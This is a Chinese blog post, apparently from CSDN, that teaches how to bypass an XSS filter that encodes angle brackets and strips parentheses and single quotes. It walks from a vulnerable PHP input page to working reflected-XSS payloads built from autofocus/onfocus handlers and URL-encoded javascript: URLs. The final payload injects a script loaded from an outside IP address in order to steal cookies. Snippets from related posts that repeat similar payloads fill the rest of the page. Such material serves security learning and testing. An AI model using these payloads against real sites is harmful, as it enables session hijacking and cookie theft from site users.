【应用安全——XSS】过滤圆括号、尖括号绕过

最新推荐文章于 2021-07-25 13:01:30 发布

FLy_鹏程万里

最新推荐文章于 2021-07-25 13:01:30 发布

阅读量4.3w

点赞数 5

分类专栏： # 移动安全基础篇 # 移动安全高级篇

移动安全基础篇同时被 2 个专栏收录

43 篇文章 5 订阅

订阅专栏

移动安全高级篇

22 篇文章 5 订阅

订阅专栏

先看下程序大概写法：

<?php
header("X-XSS-Protection:0");
$out = $_GET['code'];
$out = str_replace("<","&lt;",$out);
$out = str_replace(">","&gt;",$out);
$out = str_replace("("," ",$out);
$out = str_replace(")"," ",$out);
$out = str_replace("'"," ",$out);
echo "<html>
<body>
<input value=\"$out\">
</body>
</html>";
?>

首先编码了尖括号，那么无法闭合input标签，注意到这里是没有过滤双引号的。

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=alert(1) x="

输出源码如下：

<input value="1" autofocus onfocus=alert 1  x="">

因为过滤了小括号，无法弹窗，可以考虑用location中URL编码小括号绕过。

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location='javasCript:alert%25281%2529' x="

但是这里过滤了单引号，我们改为双引号

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location="javasCript:s=document.createElement%2528%2522script%2522%2529;s.src=%2522//120.92.84.50/myjs/cookie.js%2522;document.body.appendChild%2528s%2529;" x="

或者使用this.name传入，修改如下：

http://192.168.192.120:8080/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="

可以成功弹窗了，然后引入js，获取Cookie。

参考文章：
https://www.secpulse.com/archives/47696.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

5
点赞
踩
33

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

XSS过滤绕过总结_xss绕过字符过滤

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

08-29

1577

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。...

xss绕过字符过滤_Xss小游戏通关秘籍

weixin_39758712的博客

12-01

511

原创： Kale 合天智汇原创投稿活动：https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站，界面很有意思，很适合寓教于乐。于是玩了一下午，特此记录下来！xss姿势众多，所以每关也只是给了一部分示例！知识前导什么是XSS？XSS 或者说跨站脚本是一种 We...

1 条评论您还未登录，请先登录后发表或查看评论

我的渗透笔记之XSS绕过技巧

xf555er的博客

03-03

1万+

1、单引号、双引号和尖括号之间的闭合。有些标签例如,构造的payload应该为” >，那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义，利用注释符号和一些属性事件. 例如，构造payload为" οnclick=alert(1)//，组成的标签为<input value="" o...

xss绕过尖括号和双括号_XSS过关wp（未完待续，目前13）

weixin_42309456的博客

12-16

697

1.LEVEL 1审计源码：注意这几行：<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ，然后直接拼接echo所以给name直接传个最简单的xss弹窗即可：2.LEVEL...

XSS绕过方式

OKAY_TC的博客

04-16

3015

记录挖洞过程中所遇到的XSS绕过 1. 过滤了<>尖括号： //原理：利用html以及js伪协议，当用户打开页面缓冲页面会自动获取焦点，从而触发js代码生成script标签，达到目的。 autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...

这是一篇另类的XSS绕过奇招

Adminxe的博客

05-03

461

1.过滤了<>尖括号：原理：利用html以及js伪协议，当用户打开页面缓冲页面会自动获取焦点，从而触发js代码生成script标签，达到目的。 autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appen...

xss绕过尖括号和双括号_xss防御及绕过-小记1

weixin_29315091的博客

12-23

3027

XSS搞安全的应该都很熟悉。本次并不是说其原理，仅是分享下在测试过程中遇到的案例。本人小白一枚，所以案例大佬们看着可能非常简单，就当是记录下自己笔记吧，不喜勿喷哈。。关于xss的防御，基本上都是采用输入过滤，输出编码。最近做的一个项目中的某个模块中，进行了输入过滤，采用跳转的形式。比如遇到<>或alert，响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...

xss绕过尖括号和双括号_看我如何 Bypass WAF 弹 XSS

weixin_32955455的博客

12-27

1713

点击蓝字关注我们声明本文作者：Keac本文字数：1600阅读时长：15分钟附件/链接：点击查看原文下载声明：请勿用作违法用途，否则后果自负本文属于WgpSec原创奖励计划，未经许可禁止转载前言Xss bypass waf 并且构造函数使危害更大,一般我们找到一个在js里面的可控点往往不能使危害更大，比如打开页面就执行一、开始正在干活，同事发来一条消息XSS？搞起随手试了下，发现网站存在...

xss绕过尖括号和双括号_强防御下的XSS绕过思路（一）白名单篇

weixin_39532754的博客

12-27

5439

前言很多白帽子在挖掘XSS漏洞的时候，往往会遇到一个问题，就是明明发现这里的过滤有缺陷，但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维，往往只会反复的去尝试各种不同 payload代码，寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下，往往只能是竹篮打水一场空。鉴于这种情况，这里主要分3个章节来简单的分享一些XSS绕过思路。【第一节】白名单限...

xss绕过尖括号和双括号_【Web安全入门】三个技巧教你玩转XSS漏洞

weixin_42367454的博客

01-07

1627

XSS漏洞是Web应用程序中最常见的漏洞之一，想要入门Web安全的小伙伴，这个知识点是必学的。i春秋官网中有很多关于XSS漏洞的课程，新手小白可以去官网看课学习。学习地址：https://www.ichunqiu.com/search/XSS漏洞XSS是一种经常出现在Web应用中的计算机安全漏洞，也是客户端脚本安全的头号大敌。今天i春秋跟大家分享的是XSS漏洞的进阶篇，如何利用XSS漏洞的一些小技...

第十二节 XSS 过滤器绕过-01

09-15

XSS 过滤器绕过技术详解 ...XSS 过滤器绕过技术需要攻击者具备深入的知识和经验，包括 Web 应用程序安全、XSS 攻击技术、自动化工具使用等。Web 开发者需要了解这些技术，来防止 XSS 攻击和保护用户信息。

xss绕过尖括号和双括号_记录一次有意思的XSS过滤绕过2

weixin_36211712的博客

12-23

2322

前几天在漏洞挖掘中遇到个xss，感觉绕过过程蛮有意思的，写篇文章记录下。接下里是我对这个xss详细的分析和绕过存在问题站点http://******/index/appInfo?appId=784&url=xss当我查看源代码搜索xss：一处输出点：继续搜索第二处输出点：两次输出，第一次输出是在input标签中，第二次是在js中，这里不考虑input中利用了。因为input的type为hi...

xss绕过尖括号和双括号_XSS绕过

weixin_39576018的博客

12-23

1626

大家都知道，普遍的防御XSS攻击的方法是在后台对以下字符进行转义：、’、”，但是经过本人的研究发现，在一些特殊场景下，即使对以上字符进行了转义，还是可以执行XSS攻击的。首先看一个JS的例子：12vars ="u003cu003e";3alert(s);4运行这段代码，结果显示如下：看到这么熟悉的尖括号，大家会不会有一些兴奋的感觉呢？JS代码中并没有出现尖括号，可是运行时却输出了尖括号！！！这意...

xss尖括号等被转义情况下的绕过测试

热门推荐

z1moq的博客

07-25

1万+

打开靶场目标网站存在反射型xss漏洞，我们使用常用的方法进行测试发现并无作用，打开网站源码查看问题情况确实后端会将用户输入的数据无过滤直接返回前端，但是存在个别符号被转义的问题，导致无法正常弹窗通过查找资料可知，可以通过使用三重url编码的方式绕过这一问题尝试使用此方法进行绕过 emmmmmmm发现并不行尝试使用编码绕过发现也被转义了既然无法实现转义的绕过，就再次仔细观察前端页面代码发现在form表单中也会直接显示，并且发现 value 的值是由单引号闭合，且单引号在前几次测

xss绕过尖括号和双括号_XSS绕过<>进行测试

weixin_42406749的博客

01-30

5203

大家都知道，普遍的防御XSS攻击的方法是在后台对以下字符进行转义：、’、”，但是经过本人的研究发现，在一些特殊场景下，即使对以上字符进行了转义，还是可以执行XSS攻击的。首先看一个JS的例子：Default1234vars="u003cu003e";alert(s);运行这段代码，结果显示如下：看到这么熟悉的尖括号，大家会不会有一些兴奋的感觉呢？JS代码中并没有出现尖括号，可是运行时却输出了尖括号...

xss绕过尖括号和双括号_XSS绕过filter高级技术part1

weixin_29903043的博客

12-23

1431

在如今的web时代，XSS攻击十分常见，针对xss攻击的防御也有不少，Filter就是一种用来防御xss攻击的最常见的手段，filter通常是采用黑名单的形式或者基于正则表达式来过滤。尽管如此，依然有很多技术可以用来绕过Filter。基本变形我们可以先从绕过相对简单的filter开始。根据Filter过滤规则复杂度的不同，绕过的难易程度肯定也不同，这些简单的过滤器还是比较容易绕过的，只要做一些基本...

xss绕过尖括号和双括号_从Cookie中的Self-XSS到高危XSS

weixin_42290401的博客

12-16

314

上个月我到Synack的私有漏洞悬赏平台进行挖洞，发现在他们的一个网页中存在反射型XSS漏洞。由于Synack漏洞悬赏计划的私密性，我不会在这篇文章中提到测试目标，但是我将说明我是如何克服所遇到的许多不同的限制，最终挖到一个高危漏洞的。最初我的发现的XSS漏洞得到了272美元奖励，因为我无法证明我能访问文档对象模型，也就是DOM。而无法访问DOM的原因是括号字符被过滤，因此无法执行有效的paylo...

xss 绕过尖括号_XSS触发语句备忘

weixin_31205797的博客

01-18

861

一、标准语句二、尝试大小写三、使用标签1、windows事件//图片加载错误时触发2、鼠标事件//鼠标指针移动到元素时触发//鼠标指针移出时触发四、使用标签1、使用href属性qqtestaaaaaaa五、使用标签//用户按下按键时触发//用户按下按键时触发//用户松开按键时触发六、使用标签七、使用八、使用标签九、使用标签//加载时触发十、使用标签text//元素上点击鼠标时触发...

xss绕过尖括号转义